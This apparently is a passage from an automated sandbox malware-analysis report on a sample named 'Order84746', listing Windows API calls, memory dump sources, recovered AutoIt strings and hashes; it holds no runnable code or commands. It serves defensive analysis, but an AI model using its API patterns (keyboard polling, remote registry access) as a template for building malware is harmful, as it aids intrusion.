                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                          • String ID:
                          • API String ID: 2347767575-0
                          • Opcode ID: bc356115280e48261a5e94f747a49f4190334019fce9e6407a731ab70465c1d4
                          • Instruction ID: c0b43bc0b3002b0cfee86f10796e35c9dccc9a0d308bacb5f49302d37849c548
                          • Opcode Fuzzy Hash: bc356115280e48261a5e94f747a49f4190334019fce9e6407a731ab70465c1d4
                          • Instruction Fuzzy Hash: C0514B71A01209AFDF10DF90DD45AEEBBBAFF44300F048119E921A6290DB749E45DB61
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2889450990-2391861430
                          • Opcode ID: 388bd82beff61bc568ac80ee49636f83c134ac98ac8847726989dca8e7ec4a0d
                          • Instruction ID: e3bc312cc5e2fd87103492b9aabaffcbfbd89b778b764869424d44a3dc21fc4a
                          • Opcode Fuzzy Hash: 388bd82beff61bc568ac80ee49636f83c134ac98ac8847726989dca8e7ec4a0d
                          • Instruction Fuzzy Hash: 9651BD71800159BACF14EBA8DD46EEEB778FF06304F104065F505B20A2EB716F59DB62
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LoadString__swprintf_wprintf
                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                          • API String ID: 2889450990-3420473620
                          • Opcode ID: 4cc6dc2eeb8613ec29d9bec190f75b264d4beaf825db4397b7caf7c0d2dfc8c2
                          • Instruction ID: 79d69b136b48f4aff4ad1fc6e61cb4f3e759ba4cdf96685bea4ad92e554c31db
                          • Opcode Fuzzy Hash: 4cc6dc2eeb8613ec29d9bec190f75b264d4beaf825db4397b7caf7c0d2dfc8c2
                          • Instruction Fuzzy Hash: A251BD71900259AACF15EBE8DD42EEEB778FF05344F104065F105B20A2EB706F59DB62
                          APIs
                          • _memset.LIBCMT ref: 009255D7
                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00925664
                          • GetMenuItemCount.USER32(009A1708), ref: 009256ED
                          • DeleteMenu.USER32(009A1708,00000005,00000000,000000F5,?,?), ref: 0092577D
                          • DeleteMenu.USER32(009A1708,00000004,00000000), ref: 00925785
                          • DeleteMenu.USER32(009A1708,00000006,00000000), ref: 0092578D
                          • DeleteMenu.USER32(009A1708,00000003,00000000), ref: 00925795
                          • GetMenuItemCount.USER32(009A1708), ref: 0092579D
                          • SetMenuItemInfoW.USER32(009A1708,00000004,00000000,00000030), ref: 009257D3
                          • GetCursorPos.USER32(?), ref: 009257DD
                          • SetForegroundWindow.USER32(00000000), ref: 009257E6
                          • TrackPopupMenuEx.USER32(009A1708,00000000,?,00000000,00000000,00000000), ref: 009257F9
                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00925805
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                          • String ID:
                          • API String ID: 3993528054-0
                          • Opcode ID: fa8ba29a0282193f3b049d8a05d18fea4048b7760b18ffe276f1ae897971b695
                          • Instruction ID: 7a4fc8e0266397b6a787250877d42a04ddc2ee95f32354f5bbcc844f2b9a27f5
                          • Opcode Fuzzy Hash: fa8ba29a0282193f3b049d8a05d18fea4048b7760b18ffe276f1ae897971b695
                          • Instruction Fuzzy Hash: C9712670645A25BFFB209F54EC49FAABF69FF40368F254205F529AA1E8C7B05C10DB90
                          APIs
                          • _memset.LIBCMT ref: 0091A1DC
                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0091A211
                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0091A22D
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0091A249
                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0091A273
                          • CLSIDFromString.COMBASE(?,?), ref: 0091A29B
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0091A2A6
                          • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0091A2AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                          • API String ID: 1687751970-22481851
                          • Opcode ID: 363467e47d3a3fb73e34b2b5c1425d6b323f25a96e401b1ebbe005b284827fc5
                          • Instruction ID: 61a8755b755a2ac891b0f301031d08f3d3573ddb99e42718e92f7f8e92e3413f
                          • Opcode Fuzzy Hash: 363467e47d3a3fb73e34b2b5c1425d6b323f25a96e401b1ebbe005b284827fc5
                          • Instruction Fuzzy Hash: 47412672D1122DABCF11EBA9DC85DEDB7B8FF19354F004029E911A3160EB709E45DB91
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009536F4,00000010,?,Bad directive syntax error,0097DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009225D6
                          • LoadStringW.USER32(00000000,?,009536F4,00000010), ref: 009225DD
                          • _wprintf.LIBCMT ref: 00922610
                          • __swprintf.LIBCMT ref: 00922632
                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009226A1
                          Strings
                          Similarity
                          • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                          • API String ID: 1080873982-4153970271
                          • Opcode ID: 4e1134d4803b830eaf50cc4129fb86ab33756a6eb0cd11b1db46292d59941c1f
                          • Instruction ID: 66e0683cb8dc8c093f23482839dacb7c02c6368d2f526c9e10a6bccad7a4f1fc
                          • Opcode Fuzzy Hash: 4e1134d4803b830eaf50cc4129fb86ab33756a6eb0cd11b1db46292d59941c1f
                          • Instruction Fuzzy Hash: 45218D3290025ABFCF11AF94CC0AFEE7B39FF19308F04445AF515A20A2EB71A619DB51
                          APIs
                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00927B42
                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00927B58
                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00927B69
                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00927B7B
                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00927B8C
                          Strings
                          Similarity
                          • API ID: SendString
                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                          • API String ID: 890592661-1007645807
                          • Opcode ID: 7ce12de20c51f0c58d919d7c1adf587c9617cf54e8f30dfb3a97745d92dd0a4b
                          • Instruction ID: 06140c11883596aacefa86c66cea2630385feda0ef1ec917d1ef12585a079a4b
                          • Opcode Fuzzy Hash: 7ce12de20c51f0c58d919d7c1adf587c9617cf54e8f30dfb3a97745d92dd0a4b
                          • Instruction Fuzzy Hash: 0D1198A1A502A979DB20B7EADC4ADFFBA7CEBD2B14F0044197411F20D1DA601E45C6B1
                          APIs
                          • timeGetTime.WINMM ref: 00927794
                            • Part of subcall function 008FDC38: timeGetTime.WINMM(?,75C0B400,009558AB), ref: 008FDC3C
                          • Sleep.KERNEL32(0000000A), ref: 009277C0
                          • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 009277E4
                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00927806
                          • SetActiveWindow.USER32 ref: 00927825
                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00927833
                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00927852
                          • Sleep.KERNEL32(000000FA), ref: 0092785D
                          • IsWindow.USER32 ref: 00927869
                          • EndDialog.USER32(00000000), ref: 0092787A
                          Strings
                          Similarity
                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                          • String ID: BUTTON
                          • API String ID: 1194449130-3405671355
                          • Opcode ID: 928cbf61b63deb1a86ca4c25d74ff4593c9a680163f7ff872f8beb0a56878189
                          • Instruction ID: bc331f8e20bf97fc75aa9137b3c771a8244cfbe1674690dc0125a606ae3fed73
                          • Opcode Fuzzy Hash: 928cbf61b63deb1a86ca4c25d74ff4593c9a680163f7ff872f8beb0a56878189
                          • Instruction Fuzzy Hash: DA2162B062D219BFE7045B60FC89B2ABF2DFF46348B404128F51792165CFB14D04EAA1
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CoInitialize.OLE32(00000000), ref: 0093034B
                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 009303DE
                          • SHGetDesktopFolder.SHELL32(?), ref: 009303F2
                          • CoCreateInstance.COMBASE(0096DA8C,00000000,00000001,00993CF8,?), ref: 0093043E
                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 009304AD
                          • CoTaskMemFree.COMBASE(?), ref: 00930505
                          • _memset.LIBCMT ref: 00930542
                          • SHBrowseForFolderW.SHELL32(?), ref: 0093057E
                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 009305A1
                          • CoTaskMemFree.COMBASE(00000000), ref: 009305A8
                          • CoTaskMemFree.COMBASE(00000000), ref: 009305DF
                          • CoUninitialize.COMBASE ref: 009305E1
                          Similarity
                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                          • String ID:
                          • API String ID: 1246142700-0
                          • Opcode ID: 560459e88f96644599e2bd4642815f6587adb13b31a2e4a4673457370f204895
                          • Instruction ID: 37b2bc68d796277e56903a743a140751295ac840701603610460e1be845636bb
                          • Opcode Fuzzy Hash: 560459e88f96644599e2bd4642815f6587adb13b31a2e4a4673457370f204895
                          • Instruction Fuzzy Hash: EFB1E675A00209AFDB04DFA9C8989AEBBB9FF88304F048459F915EB251DB70EE41CF50
                          APIs
                          • GetKeyboardState.USER32(?), ref: 00922ED6
                          • SetKeyboardState.USER32(?), ref: 00922F41
                          • GetAsyncKeyState.USER32(000000A0), ref: 00922F61
                          • GetKeyState.USER32(000000A0), ref: 00922F78
                          • GetAsyncKeyState.USER32(000000A1), ref: 00922FA7
                          • GetKeyState.USER32(000000A1), ref: 00922FB8
                          • GetAsyncKeyState.USER32(00000011), ref: 00922FE4
                          • GetKeyState.USER32(00000011), ref: 00922FF2
                          • GetAsyncKeyState.USER32(00000012), ref: 0092301B
                          • GetKeyState.USER32(00000012), ref: 00923029
                          • GetAsyncKeyState.USER32(0000005B), ref: 00923052
                          • GetKeyState.USER32(0000005B), ref: 00923060
                          Similarity
                          • API ID: State$Async$Keyboard
                          • String ID:
                          • API String ID: 541375521-0
                          • Opcode ID: 7b9cf2c0476ce97b5398b837c716dbd4df7648664c21c72d1c29ffe9dd91a465
                          • Instruction ID: 6b60f6f7e94f870c257c2ff8e24e1e55323068744dd8815b93ea20e5bc83fd9e
                          • Opcode Fuzzy Hash: 7b9cf2c0476ce97b5398b837c716dbd4df7648664c21c72d1c29ffe9dd91a465
                          • Instruction Fuzzy Hash: B251EB60A087E439FB35DB64A9107EEBFF85F11340F08859DD5C25A1C6DA949B4CC7A2
                          APIs
                          • GetDlgItem.USER32(?,00000001), ref: 0091ED1E
                          • GetWindowRect.USER32(00000000,?), ref: 0091ED30
                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0091ED8E
                          • GetDlgItem.USER32(?,00000002), ref: 0091ED99
                          • GetWindowRect.USER32(00000000,?), ref: 0091EDAB
                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0091EE01
                          • GetDlgItem.USER32(?,000003E9), ref: 0091EE0F
                          • GetWindowRect.USER32(00000000,?), ref: 0091EE20
                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0091EE63
                          • GetDlgItem.USER32(?,000003EA), ref: 0091EE71
                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0091EE8E
                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0091EE9B
                          Similarity
                          • API ID: Window$ItemMoveRect$Invalidate
                          • String ID:
                          • API String ID: 3096461208-0
                          • Opcode ID: 0216c98d760daf0f4b646f1f71f1dd379e0ce86de3ffcb62daf814408ca6844c
                          • Instruction ID: 6d494dd2a7cf67626edc2e62e15073c39ca94fcb17fa132845c9f7c4b5a66fde
                          • Opcode Fuzzy Hash: 0216c98d760daf0f4b646f1f71f1dd379e0ce86de3ffcb62daf814408ca6844c
                          • Instruction Fuzzy Hash: 0F511375B14209AFDB18CF69DD85AAEBBBAFB88700F54812DF919D72D0D7B09D408B10
                          APIs
                            • Part of subcall function 008FB526: GetWindowLongW.USER32(?,000000EB), ref: 008FB537
                          • GetSysColor.USER32(0000000F), ref: 008FB438
                          Similarity
                          • API ID: ColorLongWindow
                          • String ID:
                          • API String ID: 259745315-0
                          • Opcode ID: 68e3f106fde20314619db6b7b358e0f3e08d2f17c381567135b989769e5ac92f
                          • Instruction ID: 392256e24a9db833e88c6ae112818748305a73151f322c8a2313d44179fd0425
                          • Opcode Fuzzy Hash: 68e3f106fde20314619db6b7b358e0f3e08d2f17c381567135b989769e5ac92f
                          • Instruction Fuzzy Hash: FA41F030505108ABDB245F38DC89BB83B66FB16331F284265FE65CA1E6C770CC41EB25
                          APIs
                          Similarity
                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                          • String ID:
                          • API String ID: 136442275-0
                          • Opcode ID: 33652aecc3df9c2260e861fc10dd5070f315220204e2b0a9f172a687250ff111
                          • Instruction ID: 497169ab0b4463498ce5d08f4f3278e929fd112b6efd25c8295b9e3e28708077
                          • Opcode Fuzzy Hash: 33652aecc3df9c2260e861fc10dd5070f315220204e2b0a9f172a687250ff111
                          • Instruction Fuzzy Hash: AD41117684522CAEDF65DB94DC45EDF73BCEB84300F0041A6B659A2095EB30ABE58F50
                          APIs
                          • CharLowerBuffW.USER32(0097DC00,0097DC00,0097DC00), ref: 0092D7CE
                          • GetDriveTypeW.KERNEL32(?,00993A70,00000061), ref: 0092D898
                          • _wcscpy.LIBCMT ref: 0092D8C2
                          Strings
                          Similarity
                          • API ID: BuffCharDriveLowerType_wcscpy
                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                          • API String ID: 2820617543-1000479233
                          • Opcode ID: 57a9302e019108f688f7f56a8be85e8407f1a458fe103e47acb3c4da1620b65d
                          • Instruction ID: dae7f2e27af3a862758cc3fcdd5b3b16cb425a0336dd5dcf1eaefd5dc0219981
                          • Opcode Fuzzy Hash: 57a9302e019108f688f7f56a8be85e8407f1a458fe103e47acb3c4da1620b65d
                          • Instruction Fuzzy Hash: EA51F435105344AFC710EF18E881AAFB7A5FF85314F20882DF59A972A6DB31DE05CB52
                          APIs
                          • __swprintf.LIBCMT ref: 008E93AB
                          • __itow.LIBCMT ref: 008E93DF
                            • Part of subcall function 00901557: _xtow@16.LIBCMT ref: 00901578
                          Strings
                          Similarity
                          • API ID: __itow__swprintf_xtow@16
                          • String ID: %.15g$0x%p$False$True
                          • API String ID: 1502193981-2263619337
                          • Opcode ID: d5d307833563b3945d9f4323ec5fda405e045dcf969c7dab50faa4e516e29f6c
                          • Instruction ID: 5d4fbc9c129c7f1e800846a6f8a34e62e91c380bf17e25ea9bfe8e9c920f58b1
                          • Opcode Fuzzy Hash: d5d307833563b3945d9f4323ec5fda405e045dcf969c7dab50faa4e516e29f6c
                          • Instruction Fuzzy Hash: BC41E871504209AFDB24DF7AD941FAAB3E8FF89304F20446EE589D72C1EA71D985CB11
                          APIs
                          • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0094A259
                          • CreateCompatibleDC.GDI32(00000000), ref: 0094A260
                          • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0094A273
                          • SelectObject.GDI32(00000000,00000000), ref: 0094A27B
                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0094A286
                          • DeleteDC.GDI32(00000000), ref: 0094A28F
                          • GetWindowLongW.USER32(?,000000EC), ref: 0094A299
                          • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0094A2AD
                          • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0094A2B9
                          Strings
                          Similarity
                          • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                          • String ID: static
                          • API String ID: 2559357485-2160076837
                          • Opcode ID: 4199ac775fa94dc863c04a9774411f993b215fa928199c09ecc8ad2d287bc335
                          • Instruction ID: 7ab47b7567bb0239e1b2abec0a592aeeac039d2e4eb0d7b7f6e0337aa1bb0052
                          • Opcode Fuzzy Hash: 4199ac775fa94dc863c04a9774411f993b215fa928199c09ecc8ad2d287bc335
                          • Instruction Fuzzy Hash: 0231BE31645215ABDF119FA4DC49FEB3B6DFF0E360F110218FA29A60A0C7B5D811EBA0
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 2620052-3771769585
                          • Opcode ID: 92a00531ad656268d61f497ceb5414c40bde9104e4bcee9a35f2cd9eb1b5f7ff
                          • Instruction ID: 3a7c89f3b805cd11d5ddb68f7f731270b097c7d1b68e219eda10fb837911fa37
                          • Opcode Fuzzy Hash: 92a00531ad656268d61f497ceb5414c40bde9104e4bcee9a35f2cd9eb1b5f7ff
                          • Instruction Fuzzy Hash: 4811E772A08224AFCF14AB74BD49EDA77BCEF80710F040069F155A60D1EFB49A819661
                          APIs
                          • _memset.LIBCMT ref: 00905047
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • __gmtime64_s.LIBCMT ref: 009050E0
                          • __gmtime64_s.LIBCMT ref: 00905116
                          • __gmtime64_s.LIBCMT ref: 00905133
                          • __allrem.LIBCMT ref: 00905189
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009051A5
                          • __allrem.LIBCMT ref: 009051BC
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009051DA
                          • __allrem.LIBCMT ref: 009051F1
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0090520F
                          • __invoke_watson.LIBCMT ref: 00905280
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                          • String ID:
                          • API String ID: 384356119-0
                          • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                          • Instruction ID: e8b65c949299d459631a646b7c15ae57c32ec8756aca815a7df227c40bfcf7bb
                          • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                          • Instruction Fuzzy Hash: 5871A472B01B1AAFE714AE68CC41BABB3BDAF50764F154229F524D66C1E770D9808FD0
                          APIs
                          • _memset.LIBCMT ref: 00924DF8
                          • GetMenuItemInfoW.USER32(009A1708,000000FF,00000000,00000030), ref: 00924E59
                          • SetMenuItemInfoW.USER32(009A1708,00000004,00000000,00000030), ref: 00924E8F
                          • Sleep.KERNEL32(000001F4), ref: 00924EA1
                          • GetMenuItemCount.USER32(?), ref: 00924EE5
                          • GetMenuItemID.USER32(?,00000000), ref: 00924F01
                          • GetMenuItemID.USER32(?,-00000001), ref: 00924F2B
                          • GetMenuItemID.USER32(?,?), ref: 00924F70
                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00924FB6
                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00924FCA
                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00924FEB
                          Similarity
                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                          • String ID:
                          • API String ID: 4176008265-0
                          • Opcode ID: 16166021a9f81c65fbbde39dcbad6ed91382b1d02bf4319ef4325c101b6925c4
                          • Instruction ID: 677fa5dc83ff0b310c6fe645c489a45b3dce30e97d053b3351cb167411da1d84
                          • Opcode Fuzzy Hash: 16166021a9f81c65fbbde39dcbad6ed91382b1d02bf4319ef4325c101b6925c4
                          • Instruction Fuzzy Hash: 4C61C171A14269AFDB21CFA4ED88AEE7BB8FB85304F150459F412A3299D370AD04DB61
                          APIs
                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00949C98
                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00949C9B
                          • GetWindowLongW.USER32(?,000000F0), ref: 00949CBF
                          • _memset.LIBCMT ref: 00949CD0
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00949CE2
                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00949D5A
                          Similarity
                          • API ID: MessageSend$LongWindow_memset
                          • String ID:
                          • API String ID: 830647256-0
                          • Opcode ID: dbb45b784a0453d5d23c0e3aa6953ff059bafb2604e4924f8ce3dc2be3e2f1cb
                          • Instruction ID: d489b7492cfc0f85dc2667538fb6e698707e347bf891eb263f2fb9e5610d52d6
                          • Opcode Fuzzy Hash: dbb45b784a0453d5d23c0e3aa6953ff059bafb2604e4924f8ce3dc2be3e2f1cb
                          • Instruction Fuzzy Hash: 2D619C75A00208AFDB21DFA8CC81EEEB7B8EF49704F14415AFA15E7291D774AD41DB90
                          APIs
                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 009194FE
                          • SafeArrayAllocData.OLEAUT32(?), ref: 00919549
                          • VariantInit.OLEAUT32(?), ref: 0091955B
                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0091957B
                          • VariantCopy.OLEAUT32(?,?), ref: 009195BE
                          • SafeArrayUnaccessData.OLEAUT32(?), ref: 009195D2
                          • VariantClear.OLEAUT32(?), ref: 009195E7
                          • SafeArrayDestroyData.OLEAUT32(?), ref: 009195F4
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009195FD
                          • VariantClear.OLEAUT32(?), ref: 0091960F
                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0091961A
                          Similarity
                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                          • String ID:
                          • API String ID: 2706829360-0
                          • Opcode ID: 5f825494c7561d1f65c847e42f919e781169f935a79fc26f66e278634bacb0b3
                          • Instruction ID: f92080974af7c13b1ce7d38491f45b4d2a0abbf0954678f8c91799c48c646334
                          • Opcode Fuzzy Hash: 5f825494c7561d1f65c847e42f919e781169f935a79fc26f66e278634bacb0b3
                          • Instruction Fuzzy Hash: 1F412F31E1421DAFCB01DFA4DC549EEBB79FF48354F008069F912A3261DB70AA85DBA1
                          APIs
                          Strings
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$_NewEnum$get__NewEnum
                          • API String ID: 2862541840-1765764032
                          • Opcode ID: 63760d7c8066fe26c74589ad9f732a0f02ba851247044fa528cd97da136092a3
                          • Instruction ID: d2d8e1ebdd984b2669bc2ba7b25028c019935621e659bbac8efd0cda38013ebf
                          • Opcode Fuzzy Hash: 63760d7c8066fe26c74589ad9f732a0f02ba851247044fa528cd97da136092a3
                          • Instruction Fuzzy Hash: B6919171E00219AFDF24CFA9C844FAEBBB8EF85710F108559F615AB290DB749944CFA0
                          APIs
                            • Part of subcall function 008E936C: __swprintf.LIBCMT ref: 008E93AB
                            • Part of subcall function 008E936C: __itow.LIBCMT ref: 008E93DF
                          • CoInitialize.OLE32 ref: 0093ADF6
                          • CoUninitialize.COMBASE ref: 0093AE01
                          • CoCreateInstance.COMBASE(?,00000000,00000017,0096D8FC,?), ref: 0093AE61
                          • IIDFromString.COMBASE(?,?), ref: 0093AED4
                          • VariantInit.OLEAUT32(?), ref: 0093AF6E
                          • VariantClear.OLEAUT32(?), ref: 0093AFCF
                          Strings
                          Similarity
                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                          • API String ID: 834269672-1287834457
                          • Opcode ID: 1eda10f28597cdaebde1eb535d2eb08ffa0f0f54f4bad9358d68d2af27b21983
                          • Instruction ID: d0bb3e898b9d701c1e7edeb8ec6e45f8783a414bab358ae6f813cbe8efdb06e3
                          • Opcode Fuzzy Hash: 1eda10f28597cdaebde1eb535d2eb08ffa0f0f54f4bad9358d68d2af27b21983
                          • Instruction Fuzzy Hash: 0F618B71608311AFD721DF64C848B6ABBE8EF89714F10481DF9859B2A2C774ED48CB93
                          APIs
                          • WSAStartup.WS2_32(00000101,?), ref: 00938168
                          • inet_addr.WS2_32(?), ref: 009381AD
                          • gethostbyname.WS2_32(?), ref: 009381B9
                          • IcmpCreateFile.IPHLPAPI ref: 009381C7
                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00938237
                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0093824D
